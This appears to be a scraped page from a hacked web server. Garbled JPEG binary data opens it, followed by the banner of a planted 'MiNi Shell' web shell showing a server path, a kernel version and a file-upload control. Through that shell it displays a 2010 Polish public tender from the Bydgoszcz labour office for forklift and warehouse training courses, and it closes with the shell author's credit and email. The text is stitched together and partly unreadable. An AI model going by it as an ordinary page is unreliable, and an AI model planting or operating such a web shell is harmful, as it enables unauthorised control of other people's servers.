JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100521/130753-N-2010.html

<p class="kh_header"><b>Bydgoszcz: NA ZORGANIZOWANIE I PRZEPROWADZENIE USŁUGI SZKOLENIOWEJ
DLA OSÓB BEZROBOTNYCH I POSZUKUJĄCYCH PRACY O NAZWIE:
Magazynier z obsługą wózków podnośnikowych 
i komputera - fakturowanie komputerowe</b><br>
<b>Numer ogłoszenia: 130753 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bydgoszczy , ul. Toruńska 147, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 36-04-300, faks 052 36-04-341.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA ZORGANIZOWANIE I PRZEPROWADZENIE USŁUGI SZKOLENIOWEJ
DLA OSÓB BEZROBOTNYCH I POSZUKUJĄCYCH PRACY O NAZWIE:
Magazynier z obsługą wózków podnośnikowych 
i komputera - fakturowanie komputerowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkolenia dla osób bezrobotnych i poszukujących pracy w ramach programów współfinansowanych ze środków Europejskiego Funduszu Społecznego, Funduszu Pracy i PFRON, o nazwie (Magazynier z obsługą wózków podnośnikowych i komputera - fakturowanie komputerowe)  CPV 80531200-7 Usługi szkolenia technicznego.

TERMIN WYKONANIA ZAMÓWIENIA:
1. Czas trwania zamówienia - 7 miesięcy (po jednym kursie w miesiącu czerwcu, sierpniu, wrześniu i październiku).
2. Planowany termin rozpoczęcia szkolenia pierwszego kursu-  do 14 dni od dnia zawarcia umowy (czerwiec 2010 roku).
3. Planowany termin zakończenia szkolenia ostatniego kursu - grudzień 2010 r.
4. Czas trwania jednego kursu - 208 godzin zegarowych (w tym przerwy) - 26 dni.

1. LICZBA KURSÓW I UCZESTNIKÓW SZKOLENIA
1) Liczba kursów - 4.
2) Liczba uczestników 1 kursu - 10 osób. 
3) Liczba uczestników wszystkich kursów (całego zamówienia) - 40 osób.
4) Minimalna liczba uczestników jednego kursu wynosi - 8 osób.
5) Maksymalna liczba uczestników jednego kursu wynosi - 10 osób. 


2. WYMAGANIA WSTĘPNE DLA UCZESTNIKÓW SZKOLENIA 
Szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy (niepełnosprawnych), posiadających wykształcenie minimum zasadnicze zawodowe.

3. CEL SZKOLENIA
Celem szkolenia jest umożliwienie osobom bezrobotnym i poszukującym pracy pozyskania wiedzy i praktycznych umiejętności w celu przygotowania ich do podjęcia zatrudnienia w zawodzie magazyniera oraz do uzyskania uprawnień do obsługi wózka podnośnikowego z napędem silnikowym i akumulatorowym oraz umiejętności obsługi komputera - fakturowanie komputerowe.

4. MIEJSCE REALIZACJI SZKOLENIA
Miejscem odbywania szkolenia musi być Bydgoszcz.
Wykonawca zobowiązany jest w formularzu oferty - załącznik nr 2 do SIWZ wskazać dokładny adres miejsca odbywania szkolenia.

5. CZAS TRWANIA I SPOSÓB ORGANIZACJI SZKOLENIA - 8 godzin lekcyjnych dziennie (nie mniej niż 30 godzin zegarowych w tygodniu) - wyklucza się możliwość organizacji zajęć weekendowych lub popołudniowych. Wymaga się, aby zajęcia odbywały się 5 razy w tygodniu, od poniedziałku do piątku.

6. MATERIAŁY DYDAKTYCZNE DLA UCZESTNIKÓW
Każdy uczestnik musi być wyposażony w bezzwrotne materiały dydaktyczne na pierwszych zajęciach (w formie drukowanej) np. skrypty z zakresów tematycznych zawartych w programie szkolenia, zeszyt, długopis. Po ukończeniu szkolenia powyższe materiały staną się własnością uczestnika szkolenia.

7. PROGRAM SZKOLENIA 
1) Program szkolenia musi być zrealizowany zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr 118, poz. 1263).
2) Program szkolenia zgodnie z § 32 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz.U. Nr 47, poz. 315) powinien zawierać w szczególności następujące informacje:
a) nazwę szkolenia, 
b) zakres szkolenia,
c) miejsce szkolenia,
d) czas trwania i sposób organizacji szkolenia,
e) wymagania wstępne dla uczestników szkolenia,
f) cele szkolenia,
g) plan nauczania - tematy zajęć edukacyjnych i czas ich realizacji,
h) opis treści szkolenia zawierający w szczególności następujące bloki tematyczne z uwzględnieniem, że zajęcia praktyczne obejmują 70 % całego szkolenia, a zajęcia teoretyczne 30 % całego szkolenia:
-organizacja pracy w magazynie,
- zasady zabezpieczania towarów w magazynie,
- elementy gospodarki magazynowej wraz dokumentami magazynowymi
- bhp,
- budowa wózków,
- ładunkoznawstwo ,
- czynności operatora przy obsłudze wózków,
- wymiana butli gazowej,
- zajęcia praktyczne z obsługi wózków podnośnikowych wraz z jazdą wózkiem
- obsługa komputera - fakturowanie komputerowe,
- ochrona danych osobowych i zachowanie tajemnicy handlowej.

i) wykaz literatury, środków i materiałów dydaktycznych,
j) sposób sprawdzenia efektów szkolenia - egzaminy, sprawdziany:
Kurs powinien się zakończyć: 
- sprawdzianem, przeprowadzonym przez komisję powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie na podstawie § 23 i 26 rozporządzenia MG z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr 118, poz. 1263). Osoba, która uzyska pozytywny wynik ww. sprawdzianu, otrzyma świadectwo oraz książkę operatora.
- Wydaniem zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 3.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U.Nr. 31, poz. 216).

8. ZAKRES MERYTORYCZNY SZKOLENIA
1) Szkolenie musi obejmować część teoretyczną i praktyczną z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej z danego zakresu (www.standardyiszkolenia.praca.gov.pl).
2) Szkolenie musi być przeprowadzone zgodnie z rozporządzeniem:
a) MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. z 2003r. Nr 169, poz. 1650 z późn. zm.),
b) MG z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr 118, poz. 1263),
c)  MG z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz.U. Nr 70, poz. 650 z późn. zm.).
3) Szkolenie należy przeprowadzić zgodnie z programem szkolenia, o którym mowa w punkcie 7 niniejszego opisu przedmiotu zamówienia.
4) Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a) dziennik zajęć wypełniany codziennie zgodnie z obowiązującym programem nauczania zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, 
b) protokół z egzaminu, 
c) rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
5) Wszystkie dokumenty osobowe dostarczone do Centrum Aktywizacji Zawodowej Powiatowego Urzędu Pracy w Bydgoszczy muszą być wykonywane w dwóch egzemplarzach (zaświadczenie o ukończeniu szkolenia, listy obecności tylko w przypadku osób korzystających ze zwrotu kosztów dojazdu, w celu podłączenia pod właściwe rozliczenie).
6) Wykonawca zobowiązany jest do należytego zabezpieczenia i przechowywania wszelkich dokumentów związanych z realizacją umowy przez okres co najmniej 10 lat od momentu zakończenia realizacji szkolenia i udostępnienia ich instytucjom krajowym i Unii Europejskiej upoważnionym do kontroli.
7) Zamawiający zastrzega sobie prawo kontroli:
a) wstępnej przedstawionej w ofercie wykonawcy bazy lokalowej i sprzętu.
b) w każdym czasie przebiegu szkolenia, jego efektywności, frekwencji uczestników oraz prawo wglądu do dokumentów, w tym dokumentów finansowych związanych  z realizacją szkolenia. 
Prawo do kontroli ma również Wojewódzki Urząd Pracy w Toruniu, Ministerstwo Rozwoju Regionalnego, Europejski Trybunał Obrachunkowy, OLAF oraz Komisja Europejska..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.12.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych spełniają warunki udziału w postępowaniu dotyczące:
1) posiadania uprawnienia do wykonywania działalności i czynności będących przedmiotem zamówienia poprzez posiadanie:
- wpisu jednostki do Rejestru Instytucji Szkoleniowych zgodnie z art. 20 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004r. (Dz. U z 2008. Nr 69, poz. 415 z późn. zm.).
2) posiadania dokumentu wystawionego przez Instytut Mechanizacji Budownictwa i Górnictwa Szklanego w Warszawie, potwierdzającego że wykonawca spełnia wymagania, o których mowa w § 25 rozporządzenia MG z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr 118, poz. 1263) oraz że posiada upoważnienie do prowadzenia działalności szkoleniowej na uprawnienia w specjalnościach określonych w Załączniku Nr 1 do ww. rozporządzenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia niezbędnego do wykonania zamówienia poprzez przeszkolenie jak największej ilości osób na szkoleniach o tematyce pokrywającej się z przedmiotem niniejszego zamówienia w zakresie obsługi wózków podnośnikowych w okresie ostatnich 3 lat kalendarzowych przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia poprzez:
a) posiadanie narzędzi oraz wyposażenia zakładu niezbędnych do realizacji zamówienia - tzn. 
- odpowiedniej sali szkoleniowej do przeprowadzenia zajęć teoretyczno-zawodowych, wyposażonej w flipchart lub tablicę klasyczną lub magnetyczną, sprzęt audiowizualny, odpowiednią liczbę miejsc i stolików dostosowaną do ilości osób szkolonych z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką. Wykonawca zobowiązany jest dysponować miejscem szkolenia o zlikwidowanych barierach architektonicznych umożliwiającym osobom niepełnosprawnych udział w szkoleniu. 
b) posiadania urządzeń technicznych niezbędnych do realizacji zamówienia tzn.
- co najmniej jeden wózek podnośnikowy o napędzie spalinowym oraz jeden wózek podnośnikowy o napędzie akumulatorowym o stanie technicznym zapewniającym odpowiedni poziom i jakość szkolenia. 
- odpowiedniej ilości stanowisk komputerowych, tak aby podczas zajęć fakturowania komputerowego zapewnić uczestnikom szkolenia indywidualny dostęp do stanowiska komputerowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania kadry dydaktycznej uczestniczącej w wykonaniu zamówienia tzn.  dysponowanie co najmniej:
- 2 osobami, które posiadają uprawnienia do prowadzenia zajęć z zakresu obsługi wózków podnośnikowych o napędzie spalinowym oraz o napędzie akumulatorowym (tzn. że osoby ukończyły szkolenie i uzyskały pozytywny wynik sprawdzianu przeprowadzonego przez komisję powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie w tym zakresie) oraz mają ukończony kurs pedagogiczny,
- dysponowanie co najmniej 1 osobą, która posiada uprawnienia do nauki fakturowania komputerowego tzn. która posiada doświadczenie w prowadzeniu zajęć z obsługi komputera w zakresie niezbędnym do obsługi programów wykorzystywanych do fakturowania komputerowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający na potwierdzenie, że oferowana usługa szkolenia odpowiada jego wymaganiom wymaga złożenia przez wykonawcę:
1) Programu szkolenia zgodnie z opisem zamawiającego zawartym w załączniku nr 1 do SIWZ - szczegółowy opis przedmiotu zamówienia.
2) Harmonogramu kursu - zgodnie ze wzorem zamawiającego - załącznik nr 7 do SIWZ,
3) Kalkulacji kosztów szkolenia - załącznik nr 8 do SIWZ. W szczegółowej kalkulacji kosztów szkolenia należy:
a) uwzględnić koszt osobogodziny szkolenia (koszt osobogodziny = koszt szkolenia : liczba godzin zegarowych szkolenia), 
b) uwzględnić koszt cateringu zleconego za 26 dni uczestnictwa w szkoleniu w kwocie 10 zł dziennie na jednego uczestnika szkolenia, 
c) nie uwzględniać kosztów ubezpieczenia od NNW. Wykonawca zobowiązany jest na własny koszt ubezpieczyć uczestników szkolenia będących osobami poszukującymi pracy (niepełnosprawnymi) od NNW.
4) Liczby godzin przeliczeniowych - załącznik nr 9 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
1) Pełnomocnictwo (sporządzone w formie pisemnej) do reprezentowania wykonawcy w postępowaniu o udzielenie zamówienia publicznego, w szczególności jeżeli wykonawcę reprezentują osoby inne niż wskazane w odpisie z KRS.
2) oświadczenia wykonawcy, że nie zalega z opłacaniem podatków oraz składek na ubezpieczenia zdrowotne i społeczne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Akredytacja wystawiona przez właściwego Kuratora Oświaty - 5</li>
<li>3 - Certyfikat jakości uslug - 5</li>
<li>4 - Doświadczenie - ilość przeszkolonych osób na szkoleniach z obsługi wózka podnośnikowego w ostatnich 3 latach - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy, o której mowa w punkcie 16.1. SIWZ  za zgodą obu stron wyrażoną na piśmie jedynie w zakresie:
1) zmiany terminu realizacji szkolenia,
2) zmiany kadry dydaktycznej wykonawcy w wyniku zdarzeń losowych, których nie można było przewidzieć w dniu zawarcia umowy (choroba, śmierć i.t.p.). Zamawiający zastrzega jednak, że w przypadku zmiany kadry wykonawca zobowiązany jest zapewnić, aby kolejna osoba spełniała minimalne wymogi dotyczące kwalifikacji, o których mowa w niniejszej SIWZ,
3) zmiany uczestników szkolenia w przypadku:
a) niepodjęcia lub rezygnacji osoby bezrobotnej lub poszukującej pracy ze szkolenia,
b) niestawienia się osoby bezrobotnej lub poszukującej pracy na szkolenie,
c) przerwania przez osobę bezrobotną lub poszukującą pracy uczestnictwa w szkoleniu,
d) stwierdzenia niezdolności do uczestnictwa osoby bezrobotnej lub poszukującej pracy w szkoleniu przez lekarza medycyny pracy.
4) zmiany dokumentacji szkolenia w przypadku zmiany przepisów prawa mających wpływ na realizację zamówienia.
5) zmiany programu szkolenia w poszczególnych tematach, ze względu na praktyczną realizację celu kursu. 
6) zmiany ilości godzin zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bydgoszczy
ul. Toruńska 147
85-950 Bydgoszcz
sekretariat, II pietro, pokój 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Bydgoszczy
ul. Toruńska 147
85-950 Bydgoszcz
sekretariat, II pietro, pokój 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego. Projekt  Uczymy się, pracujemy, zostajemy - Poddziałanie 6.1.3. PO KL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com